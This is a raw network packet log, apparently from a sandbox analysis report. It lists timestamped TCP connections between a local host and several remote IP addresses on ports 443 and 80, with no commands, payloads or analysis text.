                                                                                                                          Nov 25, 2024 16:43:21.170123100 CET4434980113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.170154095 CET49801443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.170171022 CET4434980113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.170903921 CET4434980013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.170977116 CET4434980013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.171024084 CET49800443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.171255112 CET49800443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.171272993 CET4434980013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.171286106 CET49800443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.171292067 CET4434980013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.173738956 CET49806443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.173808098 CET4434980613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.173883915 CET49806443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.173985004 CET49807443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.174012899 CET4434980713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.174066067 CET49807443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.174138069 CET49806443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.174182892 CET4434980613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.174329042 CET49807443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.174341917 CET4434980713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.193397999 CET4434980313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.193486929 CET4434980313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.193530083 CET49803443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.193597078 CET49803443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.193617105 CET4434980313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.193639994 CET49803443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.193651915 CET4434980313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.195858002 CET49808443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.195897102 CET4434980813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.195966959 CET49808443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.196146965 CET49808443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.196172953 CET4434980813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.258115053 CET4434980213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.258271933 CET4434980213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.258327961 CET49802443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.258363962 CET49802443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.258369923 CET4434980213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.258382082 CET49802443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.258384943 CET4434980213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.260567904 CET49809443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.260581017 CET4434980913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.260651112 CET49809443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.260812998 CET49809443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.260821104 CET4434980913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.302246094 CET4434980413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.302376986 CET4434980413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.302442074 CET49804443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.302488089 CET49804443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.302519083 CET4434980413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.302546978 CET49804443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.302563906 CET4434980413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.304616928 CET49810443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.304646015 CET4434981013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.304712057 CET49810443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.304907084 CET49810443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:21.304929972 CET4434981013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:22.381855011 CET4973880192.168.2.494.46.180.190
                                                                                                                          Nov 25, 2024 16:43:22.382256985 CET49811443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:43:22.382302999 CET44349811142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:22.382355928 CET49811443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:43:22.383083105 CET49811443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:43:22.383100986 CET44349811142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:22.509510994 CET804973894.46.180.190192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:22.509563923 CET4973880192.168.2.494.46.180.190
                                                                                                                          Nov 25, 2024 16:43:22.906825066 CET4434980713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:22.907361031 CET49807443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:22.907377005 CET4434980713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:22.907810926 CET49807443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:22.907815933 CET4434980713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:22.932534933 CET4434980813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:22.933146000 CET49808443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:22.933218956 CET4434980813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:22.933446884 CET49808443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:22.933461905 CET4434980813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.043066978 CET4434980613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.045128107 CET49806443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.045205116 CET4434980613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.045586109 CET49806443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.045602083 CET4434980613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.253573895 CET4434980913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.254100084 CET49809443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.254128933 CET4434980913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.254554987 CET49809443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.254559040 CET4434980913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.258538008 CET4434981013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.258811951 CET49810443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.258860111 CET4434981013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.259124041 CET49810443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.259135962 CET4434981013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.368665934 CET4434980713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.368747950 CET4434980713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.368982077 CET49807443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.369014978 CET49807443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.369028091 CET4434980713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.369040012 CET49807443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.369045019 CET4434980713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.377252102 CET49812443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.377273083 CET4434981213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.377355099 CET49812443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.377679110 CET49812443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.377691984 CET4434981213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.453896999 CET4434980813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.454130888 CET4434980813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.454355955 CET49808443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.454425097 CET49808443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.454425097 CET49808443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.454471111 CET4434980813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.454494953 CET4434980813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.457557917 CET49813443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.457647085 CET4434981313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.457735062 CET49813443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.457914114 CET49813443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.457945108 CET4434981313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.492947102 CET4434980613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.493009090 CET4434980613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.493103981 CET49806443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.493599892 CET49806443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.493599892 CET49806443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.493633986 CET4434980613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.493659973 CET4434980613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.496110916 CET49814443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.496131897 CET4434981413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.496198893 CET49814443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.496362925 CET49814443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.496372938 CET4434981413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.705043077 CET4434981013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.705195904 CET4434981013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.705262899 CET49810443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.705307007 CET49810443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.705307007 CET49810443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.705328941 CET4434981013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.705349922 CET4434981013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.705842018 CET4434980913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.705962896 CET4434980913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.707179070 CET49809443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.708946943 CET49815443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.708998919 CET49809443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.708998919 CET4434981513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.709022045 CET49809443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.709029913 CET4434980913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.709043980 CET4434980913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.709125042 CET49815443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.709708929 CET49815443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.709753036 CET4434981513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.710993052 CET49816443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.711035013 CET4434981613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:23.711119890 CET49816443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.711246014 CET49816443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:23.711261988 CET4434981613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:24.148711920 CET44349811142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:24.149070024 CET49811443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:43:24.149096012 CET44349811142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:24.150326967 CET44349811142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:24.150645018 CET49811443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:43:24.150813103 CET44349811142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:24.203460932 CET49811443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:43:24.623739004 CET4972480192.168.2.4199.232.210.172
                                                                                                                          Nov 25, 2024 16:43:24.744374990 CET8049724199.232.210.172192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:24.744473934 CET4972480192.168.2.4199.232.210.172
                                                                                                                          Nov 25, 2024 16:43:25.214642048 CET4434981413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.215161085 CET49814443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.215182066 CET4434981413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.215643883 CET49814443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.215648890 CET4434981413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.229419947 CET4434981213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.231496096 CET49812443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.231511116 CET4434981213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.232142925 CET49812443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.232146978 CET4434981213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.327578068 CET4434981313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.328087091 CET49813443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.328144073 CET4434981313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.328402042 CET49813443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.328414917 CET4434981313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.521110058 CET4434981513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.521727085 CET49815443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.521795988 CET4434981513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.522089005 CET49815443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.522102118 CET4434981513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.527594090 CET4434981613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.527884007 CET49816443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.527909040 CET4434981613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.528225899 CET49816443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.528230906 CET4434981613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.651114941 CET4434981413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.651181936 CET4434981413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.651412010 CET49814443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.651489973 CET49814443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.651500940 CET4434981413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.651529074 CET49814443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.651534081 CET4434981413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.654613972 CET49818443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.654635906 CET4434981813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.654711008 CET49818443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.654855013 CET49818443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.654866934 CET4434981813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.684829950 CET4434981213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.684988976 CET4434981213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.685048103 CET49812443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.685077906 CET49812443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.685082912 CET4434981213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.685106039 CET49812443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.685110092 CET4434981213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.687091112 CET49819443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.687180042 CET4434981913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.687272072 CET49819443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.687362909 CET49819443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.687382936 CET4434981913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.781858921 CET4434981313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.781939030 CET4434981313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.782073975 CET49813443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.782140970 CET49813443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.782140970 CET49813443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.782180071 CET4434981313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.782207012 CET4434981313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.784873962 CET49820443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.784899950 CET4434982013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.784972906 CET49820443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.785098076 CET49820443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.785110950 CET4434982013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.976531982 CET4434981513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.976593018 CET4434981513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.976660967 CET49815443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.976871967 CET49815443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.976907015 CET4434981513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.976936102 CET49815443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.976949930 CET4434981513.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.978708982 CET4434981613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.978867054 CET4434981613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.978992939 CET49816443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.979018927 CET49816443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.979032993 CET4434981613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.979043007 CET49816443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.979048014 CET4434981613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.979913950 CET49821443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.979994059 CET4434982113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.980091095 CET49821443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.980217934 CET49821443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.980249882 CET4434982113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.981309891 CET49822443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.981331110 CET4434982213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:25.981394053 CET49822443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.981494904 CET49822443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:25.981508017 CET4434982213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.199510098 CET4434981813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.206072092 CET49818443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.206104994 CET4434981813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.206551075 CET49818443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.206554890 CET4434981813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.473639965 CET4434981913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.474152088 CET49819443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.474225998 CET4434981913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.474627018 CET49819443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.474642038 CET4434981913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.527456045 CET4434982013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.527946949 CET49820443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.527975082 CET4434982013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.528386116 CET49820443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.528392076 CET4434982013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.642123938 CET4434981813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.642184973 CET4434981813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.642292976 CET49818443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.642436028 CET49818443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.642447948 CET4434981813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.642463923 CET49818443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.642468929 CET4434981813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.645488024 CET49827443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.645524979 CET4434982713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.645626068 CET49827443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.645843983 CET49827443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.645857096 CET4434982713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.736772060 CET4434982213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.737200022 CET49822443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.737227917 CET4434982213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.737629890 CET49822443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.737634897 CET4434982213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.852962017 CET4434982113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.853450060 CET49821443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.853492975 CET4434982113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.853883028 CET49821443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.853897095 CET4434982113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.925190926 CET4434981913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.925344944 CET4434981913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.925427914 CET49819443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.925579071 CET49819443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.925579071 CET49819443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.925625086 CET4434981913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.925649881 CET4434981913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.928430080 CET49828443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.928462982 CET4434982813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.928519964 CET49828443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.928672075 CET49828443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:27.928685904 CET4434982813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.962089062 CET804973794.46.180.190192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:27.962146044 CET4973780192.168.2.494.46.180.190
                                                                                                                          Nov 25, 2024 16:43:28.236577034 CET4434982013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.236635923 CET4434982013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.236871004 CET49820443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.236915112 CET49820443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.236939907 CET4434982013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.236955881 CET49820443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.236963034 CET4434982013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.240462065 CET49829443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.240551949 CET4434982913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.240643978 CET49829443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.240791082 CET49829443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.240824938 CET4434982913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.474104881 CET4434982113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.474160910 CET4434982113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.474215984 CET49821443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.474359989 CET4434982213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.474370003 CET49821443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.474370003 CET49821443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:28.474406958 CET4434982113.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:28.474435091 CET4434982113.107.246.63192.168.2.4
